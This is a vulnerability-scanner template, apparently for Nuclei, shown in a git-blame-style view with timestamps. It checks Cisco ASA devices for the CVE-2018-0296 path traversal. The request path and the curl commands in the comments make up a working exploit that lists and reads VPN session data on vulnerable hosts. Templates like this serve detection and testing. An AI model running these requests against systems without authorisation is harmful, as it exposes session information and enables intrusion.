2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-0296
|
2020-04-22 06:42:01 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Cisco ASA path traversal vulnerability
|
|
|
|
author: organiccrap
|
|
|
|
severity: medium
|
|
|
|
# https://github.com/yassineaboukir/CVE-2018-0296
|
|
|
|
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
|
2020-05-25 07:49:06 +00:00
|
|
|
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
|
2020-04-22 06:42:01 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-22 06:42:01 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2020-05-25 07:49:06 +00:00
|
|
|
- "///sessions"
|
2020-04-22 06:42:01 +00:00
|
|
|
part: body
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|